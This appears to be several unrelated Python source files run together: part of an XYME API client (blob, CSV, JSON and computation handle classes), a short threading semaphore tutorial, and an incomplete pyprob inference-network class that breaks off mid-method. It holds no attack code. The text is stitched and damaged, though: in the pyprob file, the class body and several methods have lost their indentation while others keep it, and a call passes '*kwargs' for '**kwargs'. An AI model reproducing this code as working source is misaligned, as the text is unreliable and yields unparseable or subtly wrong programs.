        """Return the owning pipeline handle."""
        return self._pipeline

    def get_ctype(self) -> Optional[str]:
        """Return the content type of the last get_content call."""
        return self._ctype

    def get_content(self) -> Optional[ByteResponse]:
        """Download and interpret the blob content.

        Returns None for empty blobs; raises for non-full handles.
        """
        if not self.is_full():
            raise ValueError(f"URI must be full: {self}")
        if self.is_empty():
            return None
        fin, ctype = self._client._raw_request_bytes(METHOD_POST, "/uri", {
            "uri": self._uri,
            "pipeline": self.get_pipeline().get_id(),
        })
        self._ctype = ctype
        return interpret_ctype(fin, ctype)

    def list_files(self) -> List['BlobHandle']:
        """List the files below this blob location as full handles."""
        if self.is_full():
            raise ValueError(f"URI must not be full: {self}")
        resp = self._client._request_json(
            METHOD_GET, "/blob_files", {
                "blob": self._uri,
                "pipeline": self.get_pipeline().get_id(),
            })
        return [
            BlobHandle(
                self._client,
                blob_uri,
                is_full=True,
                pipeline=self._pipeline)
            for blob_uri in resp["files"]
        ]

    def as_str(self) -> str:
        """Return the string form of the handle (its uri)."""
        return f"{self.get_uri()}"

    def set_owner(self, new_owner: str) -> str:
        """Set the owner of the blob; returns the effective owner."""
        if self.is_full():
            raise ValueError(f"URI must not be full: {self}")
        pipe = self.get_pipeline()
        res = cast(BlobOwner, self._client._request_json(
            METHOD_PUT, "/blob_owner", {
                "pipeline": pipe.get_id(),
                "blob": self._uri,
                "owner": new_owner,
            }))
        return res["owner"]

    def get_owner(self) -> str:
        """Return the current owner of the blob."""
        if self.is_full():
            raise ValueError(f"URI must not be full: {self}")
        pipe = self.get_pipeline()
        res = cast(BlobOwner, self._client._request_json(
            METHOD_GET, "/blob_owner", {
                "pipeline": pipe.get_id(),
                "blob": self._uri,
            }))
        return res["owner"]

    def copy_to(
            self,
            to_uri: str,
            new_owner: Optional[str] = None) -> 'BlobHandle':
        """Copy the blob to a new uri; returns a handle to the copy."""
        if self.is_full():
            raise ValueError(f"URI must not be full: {self}")
        pipe = self.get_pipeline()
        res = cast(CopyBlob, self._client._request_json(
            METHOD_POST, "/copy_blob", {
                "pipeline": pipe.get_id(),
                "from_uri": self._uri,
                "owner": new_owner,
                "to_uri": to_uri,
            }))
        return BlobHandle(
            self._client, res["new_uri"], is_full=False, pipeline=pipe)

    def download_zip(self, to_path: Optional[str]) -> Optional[io.BytesIO]:
        """Download the blob as a zip archive.

        Writes to `to_path` when given (returning None); otherwise
        returns an in-memory buffer.
        """
        if self.is_full():
            raise ValueError(f"URI must not be full: {self}")
        cur_res, _ = self._client._raw_request_bytes(
            METHOD_GET, "/download_zip", {
                "blob": self._uri,
                "pipeline": self.get_pipeline().get_id(),
            })
        if to_path is None:
            return io.BytesIO(cur_res.read())
        with open(to_path, "wb") as file_download:
            file_download.write(cur_res.read())
        return None

    def upload_zip(
            self, source: Union[str, io.BytesIO]) -> List['BlobHandle']:
        """Upload a zip archive (path or buffer) to the blob location.

        Returns full handles for the extracted files.
        """
        if isinstance(source, str) or not hasattr(source, "read"):
            with open(f"{source}", "rb") as fin:
                zip_stream = io.BytesIO(fin.read())
        else:
            zip_stream = source
        resp = self._client._request_json(
            METHOD_FILE, "/upload_zip", {
                "blob": self._uri,
                "pipeline": self.get_pipeline().get_id(),
            }, files={
                "file": zip_stream,
            })
        return [
            BlobHandle(
                self._client,
                blob_uri,
                is_full=True,
                pipeline=self._pipeline)
            for blob_uri in resp["files"]
        ]

    def convert_model(self, reload: bool = True) -> ModelReleaseResponse:
        """Convert the stored model for release; optionally reloading."""
        return cast(ModelReleaseResponse, self._client._request_json(
            METHOD_POST, "/convert_model", {
                "blob": self._uri,
                "pipeline": self.get_pipeline().get_id(),
                "reload": reload,
            }))

    def __hash__(self) -> int:
        return hash(self.as_str())

    def __eq__(self, other: object) -> bool:
        if not isinstance(other, self.__class__):
            return False
        return self.as_str() == other.as_str()

    def __ne__(self, other: object) -> bool:
        return not self.__eq__(other)

    def __str__(self) -> str:
        return self.as_str()

    def __repr__(self) -> str:
        return f"{self.__class__.__name__}[{self.as_str()}]"
# *** BlobHandle ***
class CSVBlobHandle(BlobHandle):
    """Blob handle for csv reader nodes.

    Supports chunked uploading of csv data via the start/append/finish
    action protocol; tracks the server-reported row count, upload
    position, and temporary-file state.
    """
    def __init__(
            self,
            client: XYMEClientV3,
            pipe: PipelineHandle,
            uri: str,
            count: int,
            pos: int,
            has_tmp: bool) -> None:
        # the base class already stores client and uri
        super().__init__(client, uri, is_full=False, pipeline=pipe)
        self._pipe = pipe
        self._count = count
        self._pos = pos
        self._has_tmp = has_tmp

    def get_uri(self) -> str:
        """Return the blob uri."""
        return self._uri

    def get_count(self) -> int:
        """Return the row count (as last reported by the server)."""
        return self._count

    def get_pos(self) -> int:
        """Return the current upload position."""
        return self._pos

    def has_tmp(self) -> bool:
        """Whether a temporary upload file exists on the server."""
        return self._has_tmp

    def perform_action(
            self,
            action: str,
            additional: Dict[str, Union[str, int]],
            fobj: Optional[IO[bytes]]) -> int:
        """Run one csv action, optionally uploading a file chunk.

        Updates the cached count/pos/tmp state and returns the new
        upload position.
        """
        args: Dict[str, Union[str, int]] = {
            "blob": self.get_uri(),
            "action": action,
            "pipeline": self.get_pipeline().get_id(),
        }
        args.update(additional)
        if fobj is not None:
            method = METHOD_FILE
            files: Optional[Dict[str, IO[bytes]]] = {
                "file": fobj,
            }
        else:
            method = METHOD_POST
            files = None
        res = cast(CSVOp, self._client._request_json(
            method, "/csv_action", args, files=files))
        self._count = res["count"]
        self._has_tmp = res["tmp"]
        self._pos = res["pos"]
        return self._pos

    def start_data(self, size: int, hash_str: str, ext: str) -> int:
        """Begin an upload of `size` bytes with the given hash and ext."""
        return self.perform_action("start", {
            "ext": ext,
            "hash": hash_str,
            "size": size,
        }, None)

    def append_data(self, fobj: IO[bytes]) -> int:
        """Append one chunk of data; returns the new upload position."""
        return self.perform_action("append", {}, fobj)

    def finish_data(self) -> None:
        """Finalize the upload."""
        self.perform_action("finish", {}, None)

    def clear_tmp(self) -> None:
        """Discard the temporary upload file."""
        self.perform_action("clear", {}, None)

    def upload_data(
            self,
            file_content: IO[bytes],
            file_ext: str,
            progress_bar: Optional[IO[Any]] = sys.stdout) -> int:
        """Upload the full stream in chunks; returns the final size.

        Raises ValueError when the server acknowledges fewer bytes than
        were sent for a chunk.
        """
        init_pos = file_content.seek(0, io.SEEK_CUR)
        file_hash = get_file_hash(file_content)
        total_size = file_content.seek(0, io.SEEK_END) - init_pos
        file_content.seek(init_pos, io.SEEK_SET)
        if progress_bar is not None:
            progress_bar.write("Uploading file:\n")
            print_progress = get_progress_bar(out=progress_bar)
        else:
            # FIX: print_progress was previously unbound when
            # progress_bar was None, raising NameError below
            def print_progress(_frac: float, _final: bool) -> None:
                pass
        cur_size = self.start_data(total_size, file_hash, file_ext)
        while True:
            print_progress(cur_size / total_size, False)
            buff = file_content.read(get_file_upload_chunk_size())
            if not buff:
                break
            new_size = self.append_data(BytesIO(buff))
            if new_size - cur_size != len(buff):
                raise ValueError(
                    f"incomplete chunk upload n:{new_size} "
                    f"o:{cur_size} b:{len(buff)}")
            cur_size = new_size
        print_progress(cur_size / total_size, True)
        self.finish_data()
        return cur_size

    def add_from_file(
            self,
            filename: str,
            progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
        """Upload a csv file from disk.

        For zipped input (e.g. "data.csv.zip") the extension sent to the
        server deliberately includes the zip suffix ("csv.zip").
        """
        fname = filename
        if filename.endswith(INPUT_ZIP_EXT):
            fname = filename[:-len(INPUT_ZIP_EXT)]
        ext_pos = fname.rfind(".")
        if ext_pos >= 0:
            ext = filename[ext_pos + 1:]  # full filename
        else:
            raise ValueError("could not determine extension")
        with open(filename, "rb") as fbuff:
            self.upload_data(fbuff, ext, progress_bar)

    def add_from_df(
            self,
            df: pd.DataFrame,
            progress_bar: Optional[IO[Any]] = sys.stdout) -> None:
        """Upload a pandas DataFrame as csv."""
        io_in = None
        try:
            io_in = df_to_csv(df)
            self.upload_data(io_in, "csv", progress_bar)
        finally:
            if io_in is not None:
                io_in.close()
# *** CSVBlobHandle ***
class JSONBlobHandle(BlobHandle):
    """Blob handle for jsons_reader nodes; tracks the record count."""
    def __init__(
            self,
            client: XYMEClientV3,
            pipe: PipelineHandle,
            uri: str,
            count: int) -> None:
        super().__init__(client, uri, is_full=False, pipeline=pipe)
        self._client = client
        self._pipe = pipe
        self._uri = uri
        self._count = count

    def get_uri(self) -> str:
        """Return the blob uri."""
        return self._uri

    def get_count(self) -> int:
        """Return the record count (as last reported by the server)."""
        return self._count

    def append_jsons(self, jsons: List[Any]) -> 'JSONBlobHandle':
        """Append json records to the blob; returns self for chaining."""
        res = self._client._request_json(
            METHOD_PUT, "/json_append", {
                "pipeline": self.get_pipeline().get_id(),
                "blob": self.get_uri(),
                "jsons": jsons,
            })
        self._count = res["count"]
        return self
# *** JSONBlobHandle ***
class ComputationHandle:
    """Handle for a deferred dynamic computation result.

    The value is fetched lazily on the first get() call and cached.
    """
    def __init__(
            self,
            pipeline: PipelineHandle,
            data_id: str,
            get_dyn_error: Callable[[], Optional[str]],
            set_dyn_error: Callable[[str], None]) -> None:
        self._pipeline = pipeline
        self._data_id = data_id
        self._value: Optional[ByteResponse] = None
        # accessors for an error slot shared with the creator of this
        # handle -- presumably spanning a batch of computations
        self._get_dyn_error = get_dyn_error
        self._set_dyn_error = set_dyn_error

    def has_fetched(self) -> bool:
        """Whether the value has already been retrieved."""
        return self._value is not None

    def get(self) -> ByteResponse:
        """Fetch (once) and return the computation result.

        Records server side errors in the shared slot; a KeyError is
        re-raised as the recorded ServerSideError when one exists.
        """
        try:
            if self._value is None:
                self._value = self._pipeline.get_dynamic_result(self._data_id)
            return self._value
        except ServerSideError as e:
            if self._get_dyn_error() is None:
                self._set_dyn_error(str(e))
            raise e
        except KeyError as e:
            maybe_error = self._get_dyn_error()
            if maybe_error is not None:
                raise ServerSideError(maybe_error) from e
            raise e

    def get_id(self) -> str:
        """Return the id of the computation data."""
        return self._data_id

    def __str__(self) -> str:
        value = self._value
        if value is None:
            return f"data_id={self._data_id}"
        return f"value({type(value)})={value}"

    def __repr__(self) -> str:
        return f"{self.__class__.__name__}[{self.__str__()}]"

    def __hash__(self) -> int:
        return hash(self.get_id())

    def __eq__(self, other: object) -> bool:
        if not isinstance(other, self.__class__):
            return False
        return self.get_id() == other.get_id()

    def __ne__(self, other: object) -> bool:
        return not self.__eq__(other)
# *** ComputationHandle ***
def create_xyme_client_v3(
        url: str, token: Optional[str] = None) -> XYMEClientV3:
    """Create a v3 client for the XYME API at the given url."""
    return XYMEClientV3(url, token)
|
semaphores_tut.py | import random, time
from threading import BoundedSemaphore, Thread
max_items = 5
"""
Consider 'container' as a container, of course, with a capacity of 5
items. Defaults to 1 item if 'max_items' is passed.
"""
container = BoundedSemaphore(max_items)
def producer(nloops):
    """Attempt to add one item to the container every few seconds."""
    for _ in range(nloops):
        time.sleep(random.randrange(2, 5))
        print(time.ctime(), end=': ')
        try:
            # release() raises ValueError once the bounded capacity is hit
            container.release()
        except ValueError:
            print('Full, skipping')
        else:
            print('Produced an item')
def consumer(nloops):
    """Attempt to take one item from the container every few seconds."""
    for _ in range(nloops):
        time.sleep(random.randrange(2, 5))
        print(time.ctime(), end=': ')
        # acquire(False) disables the default blocking behaviour so an
        # empty container is reported instead of waited on
        if not container.acquire(False):
            print('Empty, skipping.')
        else:
            print('Consumed an item.')
threads = []
nloops = random.randrange(3, 6)
print('Starting with %s items.' % max_items)
# the consumer may loop more often than the producer, so it can hit an
# empty container
producer_thread = Thread(target=producer, args=(nloops,))
consumer_loops = random.randrange(nloops, nloops + max_items + 2)
consumer_thread = Thread(target=consumer, args=(consumer_loops,))
threads.extend((producer_thread, consumer_thread))
for worker in threads:
    worker.start()
for worker in threads:
    worker.join()
print('Add done.')
inference_network.py | import torch
import torch.nn as nn
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.distributed as dist
from torch.utils.data import DataLoader
import sys
import time
import os
import shutil
import uuid
import tempfile
import tarfile
import copy
import math
import warnings
from threading import Thread
from termcolor import colored
from . import Batch, OfflineDataset, TraceBatchSampler, DistributedTraceBatchSampler, EmbeddingFeedForward, EmbeddingCNN2D5C, EmbeddingCNN3D5C
from .optimizer_larc import LARC
from .. import __version__, util, Optimizer, LearningRateScheduler, ObserveEmbedding
class InferenceNetwork(nn.Module):
# observe_embeddings example: {'obs1': {'embedding':ObserveEmbedding.FEEDFORWARD, 'reshape': [10, 10], 'dim': 32, 'depth': 2}}
def __init__(self, model, observe_embeddings={}, network_type=''):
super().__init__()
self._model = model
self._layers_observe_embedding = nn.ModuleDict()
self._layers_observe_embedding_final = None
self._layers_pre_generated = False
self._layers_initialized = False
self._observe_embeddings = observe_embeddings
self._observe_embedding_dim = None
self._infer_observe = None
self._infer_observe_embedding = {}
self._optimizer = None
self._optimizer_type = None
self._optimizer_state = None
self._momentum = None
self._weight_decay = None
self._learning_rate_scheduler = None
self._learning_rate_scheduler_type = None
self._learning_rate_scheduler_state = None
self._total_train_seconds = 0
self._total_train_traces = 0
self._total_train_traces_end = None
self._total_train_iterations = 0
self._learning_rate_init = None
self._learning_rate_end = None
self._loss_init = None
self._loss_min = float('inf')
self._loss_max = None
self._loss_previous = float('inf')
self._history_train_loss = []
self._history_train_loss_trace = []
self._history_valid_loss = []
self._history_valid_loss_trace = []
self._history_num_params = []
self._history_num_params_trace = []
self._distributed_train_loss = util.to_tensor(0.)
self._distributed_valid_loss = util.to_tensor(0.)
self._distributed_history_train_loss = []
self._distributed_history_train_loss_trace = []
self._distributed_history_valid_loss = []
self._distributed_history_valid_loss_trace = []
self._modified = util.get_time_str()
self._updates = 0
self._on_cuda = False
self._device = torch.device('cpu')
self._learning_rate = None
self._momentum = None
self._batch_size = None
self._distributed_backend = None
self._distributed_world_size = None
self._network_type = network_type
    def _init_layers_observe_embedding(self, observe_embeddings, example_trace):
        """Build one embedding layer per observed variable plus a final combining layer.

        `observe_embeddings` maps variable name -> spec dict with optional keys
        'reshape', 'dim', 'embedding' and (for FEEDFORWARD) 'depth'; an empty
        spec falls back to the printed defaults. `example_trace` supplies value
        shapes. Raises ValueError when no embedding spec is given or the
        embedding type is unknown.
        """
        if len(observe_embeddings) == 0:
            raise ValueError('At least one observe embedding is needed to initialize inference network.')
        if isinstance(observe_embeddings, set):
            # A plain set of names means: use default settings for each.
            observe_embeddings = {o: {} for o in observe_embeddings}
        observe_embedding_total_dim = 0
        for name, value in observe_embeddings.items():
            variable = example_trace.named_variables[name]
            # distribution = variable.distribution
            # if distribution is None:
            #     raise ValueError('Observable {}: cannot use this observation as an input to the inference network, because there is no associated likelihood.'.format(name))
            # else:
            if 'reshape' in value:
                input_shape = torch.Size(value['reshape'])
                print('Observable {}: reshape to {}.'.format(name, input_shape))
            else:
                # Default: use the example trace's value shape as-is.
                input_shape = variable.value.size()
                print('Observable {}: reshape not specified, using shape {}.'.format(name, input_shape))
            if 'dim' in value:
                output_shape = torch.Size([value['dim']])
                print('Observable {}: using embedding dim {}.'.format(name, output_shape))
            else:
                print('Observable {}: embedding dim not specified, using the default 256.'.format(name))
                output_shape = torch.Size([256])
            if 'embedding' in value:
                embedding = value['embedding']
                print('Observable {}: using observe embedding {}.'.format(name, embedding))
            else:
                print('Observable {}: observe embedding not specified, using the default FEEDFORWARD.'.format(name))
                embedding = ObserveEmbedding.FEEDFORWARD
            if embedding == ObserveEmbedding.FEEDFORWARD:
                if 'depth' in value:
                    depth = value['depth']
                    print('Observable {}: using embedding depth {}.'.format(name, depth))
                else:
                    print('Observable {}: embedding depth not specified, using the default 2.'.format(name))
                    depth = 2
                layer = EmbeddingFeedForward(input_shape=input_shape, output_shape=output_shape, num_layers=depth)
            elif embedding == ObserveEmbedding.CNN2D5C:
                layer = EmbeddingCNN2D5C(input_shape=input_shape, output_shape=output_shape)
            elif embedding == ObserveEmbedding.CNN3D5C:
                layer = EmbeddingCNN3D5C(input_shape=input_shape, output_shape=output_shape)
            else:
                raise ValueError('Unknown embedding: {}'.format(embedding))
            layer.to(device=util._device)
            self._layers_observe_embedding[name] = layer
            observe_embedding_total_dim += util.prod(output_shape)
        self._observe_embedding_dim = observe_embedding_total_dim
        print('Observe embedding dimension: {}'.format(self._observe_embedding_dim))
        # Final feed-forward layer mixes the concatenated per-variable embeddings.
        self._layers_observe_embedding_final = EmbeddingFeedForward(input_shape=self._observe_embedding_dim, output_shape=self._observe_embedding_dim, num_layers=2)
        self._layers_observe_embedding_final.to(device=util._device)
def _embed_observe(self, traces=None):
embedding = []
for name, layer in self._layers_observe_embedding.items():
values = torch.stack([util.to_tensor(trace.named_variables[name].value) for trace in traces]).view(len(traces), -1)
embedding.append(layer(values))
embedding = torch.cat(embedding, dim=1)
embedding = self._layers_observe_embedding_final(embedding)
return embedding
def _infer_init(self, observe=None):
self._infer_observe = observe
embedding = []
for name, layer in self._layers_observe_embedding.items():
value = util.to_tensor(observe[name]).view(1, -1)
embedding.append(layer(value))
embedding = torch.cat(embedding, dim=1)
self._infer_observe_embedding = self._layers_observe_embedding_final(embedding)
    def _init_layers(self):
        """Create network-type-specific layers (implemented by subclasses)."""
        raise NotImplementedError()

    def _polymorph(self, batch):
        """Create any layers newly needed for `batch`; return whether layers changed (subclass hook)."""
        raise NotImplementedError()

    def _infer_step(self, variable, previous_variable=None, proposal_min_train_iterations=None):
        """Produce a proposal for `variable` during inference (subclass hook)."""
        raise NotImplementedError()

    def _loss(self, batch):
        """Compute the training loss for `batch` (subclass hook)."""
        raise NotImplementedError()
    def _save(self, file_name):
        """Serialize the network (weights, optimizer/scheduler state, statistics) to a gzipped tar at `file_name`."""
        self._modified = util.get_time_str()
        self._updates += 1
        data = {}
        data['pyprob_version'] = __version__
        data['torch_version'] = torch.__version__
        # The following is due to a temporary hack related with https://github.com/pytorch/pytorch/issues/9981 and can be deprecated by using dill as pickler with torch > 0.4.1
        # Shallow-copy self and strip unpicklable members; optimizer and
        # scheduler are persisted via their state dicts instead.
        data['inference_network'] = copy.copy(self)
        data['inference_network']._model = None
        data['inference_network']._optimizer = None
        if self._optimizer is None:
            data['inference_network']._optimizer_state = None
        else:
            data['inference_network']._optimizer_state = self._optimizer.state_dict()
        data['inference_network']._learning_rate_scheduler = None
        if self._learning_rate_scheduler is None:
            data['inference_network']._learning_rate_scheduler_state = None
        else:
            data['inference_network']._learning_rate_scheduler_state = self._learning_rate_scheduler.state_dict()
        def thread_save():
            # Write to a fresh temp dir, then pack into a compressed tar at file_name.
            tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
            tmp_file_name = os.path.join(tmp_dir, 'pyprob_inference_network')
            torch.save(data, tmp_file_name)
            tar = tarfile.open(file_name, 'w:gz', compresslevel=2)
            tar.add(tmp_file_name, arcname='pyprob_inference_network')
            tar.close()
            shutil.rmtree(tmp_dir)
        t = Thread(target=thread_save)
        t.start()
        # NOTE(review): start() immediately followed by join() makes this
        # effectively synchronous — presumably deliberate; confirm intent.
        t.join()
    @staticmethod
    def _load(file_name):
        """Load a network saved by `_save`, with backward-compatibility shims.

        Extracts the pickled network from the gzipped tar, warns on version or
        device mismatches, moves it to the current device, back-fills attributes
        missing from networks saved by older pyprob versions, and recreates the
        optimizer and learning-rate scheduler from their saved state dicts.
        Raises RuntimeError when the file cannot be read.
        """
        try:
            tar = tarfile.open(file_name, 'r:gz')
            tmp_dir = tempfile.mkdtemp(suffix=str(uuid.uuid4()))
            tmp_file = os.path.join(tmp_dir, 'pyprob_inference_network')
            tar.extract('pyprob_inference_network', tmp_dir)
            tar.close()
            if util._cuda_enabled:
                data = torch.load(tmp_file)
            else:
                # Remap CUDA-saved tensors to CPU storage.
                data = torch.load(tmp_file, map_location=lambda storage, loc: storage)
            shutil.rmtree(tmp_dir)
        except Exception as e:
            print(e)
            raise RuntimeError('Cannot load inference network.')
        if data['pyprob_version'] != __version__:
            warnings.warn('Different pyprob versions (loaded network: {}, current system: {})'.format(data['pyprob_version'], __version__))
        if data['torch_version'] != torch.__version__:
            warnings.warn('Different PyTorch versions (loaded network: {}, current system: {})'.format(data['torch_version'], torch.__version__))
        ret = data['inference_network']
        if util._cuda_enabled:
            if ret._on_cuda:
                if ret._device != util._device:
                    warnings.warn('Loading CUDA (device {}) network to CUDA (device {})'.format(ret._device, util._device))
            else:
                warnings.warn('Loading CPU network to CUDA (device {})'.format(util._device))
        else:
            if ret._on_cuda:
                warnings.warn('Loading CUDA (device {}) network to CPU'.format(ret._device))
        ret.to(device=util._device)
        # For compatibility loading NNs saved before 0.13.2.dev2
        if not hasattr(ret, '_distributed_train_loss'):
            ret._distributed_train_loss = util.to_tensor(0.)
        if not hasattr(ret, '_distributed_valid_loss'):
            ret._distributed_valid_loss = util.to_tensor(0.)
        if not hasattr(ret, '_distributed_history_train_loss'):
            ret._distributed_history_train_loss = []
        if not hasattr(ret, '_distributed_history_train_loss_trace'):
            ret._distributed_history_train_loss_trace = []
        if not hasattr(ret, '_distributed_history_valid_loss'):
            ret._distributed_history_valid_loss = []
        if not hasattr(ret, '_distributed_history_valid_loss_trace'):
            ret._distributed_history_valid_loss_trace = []
        if not hasattr(ret, '_optimizer_state'):
            ret._optimizer_state = None
        if not hasattr(ret, '_learning_rate_scheduler_state'):
            ret._learning_rate_scheduler_state = None
        # For compatibility loading NNs saved before 0.13.2.dev5
        if not hasattr(ret, '_total_train_traces_end'):
            ret._total_train_traces_end = None
        # For compatibility loading NNs saved before 0.13.2.dev6
        if not hasattr(ret, '_loss_init'):
            ret._loss_init = None
        if not hasattr(ret, '_learning_rate_init'):
            ret._learning_rate_init = 0
        if not hasattr(ret, '_learning_rate_end'):
            ret._learning_rate_end = 0
        if not hasattr(ret, '_weight_decay'):
            ret._weight_decay = 0
        if not hasattr(ret, '_learning_rate_scheduler_type'):
            ret._learning_rate_scheduler_type = None
        # Rebuild optimizer and scheduler from the persisted state dicts.
        ret._create_optimizer(ret._optimizer_state)
        ret._create_lr_scheduler(ret._learning_rate_scheduler_state)
        return ret
def to(self, device=None, *args, **kwargs):
self._device = device
self._on_cuda = 'cuda' in str(device)
super().to(device=device, *args, *kwargs)
    def _pre_generate_layers(self, dataset, batch_size=64, save_file_name_prefix=None):
        """Run `_polymorph` over the whole dataset once so every address-specific layer exists up front."""
        if not self._layers_initialized:
            self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
            self._init_layers()
            self._layers_initialized = True
        self._layers_pre_generated = True
        dataloader = DataLoader(dataset, batch_size=batch_size, shuffle=False, num_workers=0, collate_fn=lambda x: Batch(x))
        util.progress_bar_init('Layer pre-generation...', len(dataset), 'Traces')
        i = 0
        for i_batch, batch in enumerate(dataloader):
            i += len(batch)
            layers_changed = self._polymorph(batch)
            util.progress_bar_update(i)
            if layers_changed and (save_file_name_prefix is not None):
                # Checkpoint whenever this batch created new layers.
                file_name = '{}_00000000_pre_generated.network'.format(save_file_name_prefix)
                print('\rSaving to disk...  ', end='\r')
                self._save(file_name)
        util.progress_bar_end('Layer pre-generation complete')
def _distributed_sync_parameters(self):
""" broadcast rank 0 parameter to all ranks """
# print('Distributed training synchronizing parameters across nodes...')
for param in self.parameters():
dist.broadcast(param.data, 0)
def _distributed_sync_grad(self, world_size):
""" all_reduce grads from all ranks """
# print('Distributed training synchronizing gradients across nodes...')
# make a local map of all non-zero gradients
ttmap = util.to_tensor([1 if p.grad is not None else 0 for p in self.parameters()])
# get the global map of all non-zero gradients
pytorch_allreduce_supports_list = True
try:
dist.all_reduce([ttmap])
except:
pytorch_allreduce_supports_list = False
dist.all_reduce(ttmap)
gl = []
for i, param in enumerate(self.parameters()):
if param.grad is not None:
gl.append(param.grad.data)
elif ttmap[i]:
# someone else had a non-zero grad so make a local zero'd copy
param.grad = util.to_tensor(torch.zeros_like(param.data))
gl.append(param.grad.data)
# reduce all gradients used by at least one rank
if pytorch_allreduce_supports_list:
dist.all_reduce(gl)
else:
for g in gl:
dist.all_reduce(g)
# average them
for li in gl:
li /= float(world_size)
def _distributed_update_train_loss(self, loss, world_size):
self._distributed_train_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_train_loss)
self._distributed_train_loss /= float(world_size)
self._distributed_history_train_loss.append(float(self._distributed_train_loss))
self._distributed_history_train_loss_trace.append(self._total_train_traces)
return self._distributed_train_loss
def _distributed_update_valid_loss(self, loss, world_size):
self._distributed_valid_loss = util.to_tensor(float(loss))
dist.all_reduce(self._distributed_valid_loss)
self._distributed_valid_loss /= float(world_size)
self._distributed_history_valid_loss.append(float(self._distributed_valid_loss))
self._distributed_history_valid_loss_trace.append(self._total_train_traces)
return self._distributed_valid_loss
    def _create_optimizer(self, state_dict=None):
        """(Re)build the optimizer over the current parameters, optionally restoring saved state."""
        if self._optimizer_type is None:  # happens when loading pre-generated network
            return
        # print('Creating new optimizer')
        if self._optimizer_type in [Optimizer.ADAM, Optimizer.ADAM_LARC]:
            self._optimizer = optim.Adam(self.parameters(), lr=self._learning_rate_init, weight_decay=self._weight_decay)
        else:  # optimizer_type in [Optimizer.SGD, Optimizer.SGD_LARC]
            self._optimizer = optim.SGD(self.parameters(), lr=self._learning_rate_init, momentum=self._momentum, nesterov=True, weight_decay=self._weight_decay)
        if self._optimizer_type in [Optimizer.ADAM_LARC, Optimizer.SGD_LARC]:
            # LARC wraps the base optimizer with layer-wise adaptive rate control.
            self._optimizer = LARC(self._optimizer)
        if state_dict is not None:
            # print('Setting optimizer state')
            self._optimizer.load_state_dict(state_dict)
    def _create_lr_scheduler(self, state_dict=None):
        """(Re)build the learning-rate scheduler, optionally restoring saved state.

        POLY1/POLY2 decay the rate from `_learning_rate_init` to
        `_learning_rate_end` over `_total_train_traces_end` traces.
        """
        if self._learning_rate_scheduler_type is None:  # happens when loading pre-generated network
            return
        # print('Creating new learning rate scheduler')
        learning_rate_scheduler_type = self._learning_rate_scheduler_type
        iter_end = self._total_train_traces_end
        lr_init = self._learning_rate_init
        lr_end = self._learning_rate_end
        def _poly_decay(iter, power):
            # Polynomial interpolation between lr_init (iter=0) and lr_end (iter=iter_end).
            return (lr_init - lr_end) * ((1 - iter/iter_end) ** power) + lr_end
        if self._optimizer is None:
            self._learning_rate_scheduler = None
        elif learning_rate_scheduler_type == LearningRateScheduler.POLY1:
            # LambdaLR multiplies the base lr, hence the division by lr_init.
            self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=1.) / lr_init)
        elif learning_rate_scheduler_type == LearningRateScheduler.POLY2:
            self._learning_rate_scheduler = lr_scheduler.LambdaLR(self._optimizer, lr_lambda=lambda iter: _poly_decay(iter, power=2.) / lr_init)
        else:
            self._learning_rate_scheduler = None
        if self._learning_rate_scheduler is not None and state_dict is not None:
            # print('Setting learning rate scheduler state')
            self._learning_rate_scheduler.load_state_dict(state_dict)
    def optimize(self, num_traces, dataset, dataset_valid=None, num_traces_end=1e9, batch_size=64, valid_every=None, optimizer_type=Optimizer.ADAM, learning_rate_init=0.0001, learning_rate_end=1e-6, learning_rate_scheduler_type=LearningRateScheduler.NONE, momentum=0.9, weight_decay=1e-5, save_file_name_prefix=None, save_every_sec=600, distributed_backend=None, distributed_params_sync_every_iter=10000, distributed_num_buckets=10, dataloader_offline_num_workers=0, stop_with_bad_loss=False, log_file_name=None):
        """Train the network on `dataset` until `num_traces` traces have been seen.

        Supports optional validation (`dataset_valid`, every `valid_every`
        traces), periodic checkpointing (`save_file_name_prefix` /
        `save_every_sec`), CSV logging (`log_file_name`) and synchronous
        distributed training via `distributed_backend` (gradient all-reduce,
        periodic parameter re-sync).
        """
        if not self._layers_initialized:
            self._init_layers_observe_embedding(self._observe_embeddings, example_trace=dataset.__getitem__(0))
            self._init_layers()
            self._layers_initialized = True
        if distributed_backend is None:
            distributed_world_size = 1
            distributed_rank = 0
        else:
            dist.init_process_group(backend=distributed_backend)
            distributed_world_size = dist.get_world_size()
            distributed_rank = dist.get_rank()
            self._distributed_backend = distributed_backend
            self._distributed_world_size = distributed_world_size
        # Training data loader
        if isinstance(dataset, OfflineDataset):
            if distributed_world_size == 1:
                dataloader = DataLoader(dataset, batch_sampler=TraceBatchSampler(dataset, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
            else:
                dataloader = DataLoader(dataset, batch_sampler=DistributedTraceBatchSampler(dataset, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
        else:
            dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=0, collate_fn=lambda x: Batch(x))
        # Validation data loader
        if dataset_valid is not None:
            if distributed_world_size == 1:
                dataloader_valid = DataLoader(dataset_valid, batch_sampler=TraceBatchSampler(dataset_valid, batch_size=batch_size, shuffle_batches=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
            else:
                dataloader_valid = DataLoader(dataset_valid, batch_sampler=DistributedTraceBatchSampler(dataset_valid, batch_size=batch_size, num_buckets=distributed_num_buckets, shuffle_batches=True, shuffle_buckets=True), num_workers=dataloader_offline_num_workers, collate_fn=lambda x: Batch(x))
            if not self._layers_pre_generated:
                # Make sure layers exist for everything in the validation set.
                for i_batch, batch in enumerate(dataloader_valid):
                    self._polymorph(batch)
        if distributed_world_size > 1:
            util.init_distributed_print(distributed_rank, distributed_world_size, False)
            if distributed_rank == 0:
                print(colored('Distributed synchronous training', 'yellow', attrs=['bold']))
                print(colored('Distributed backend        : {}'.format(distributed_backend), 'yellow', attrs=['bold']))
                print(colored('Distributed world size     : {}'.format(distributed_world_size), 'yellow', attrs=['bold']))
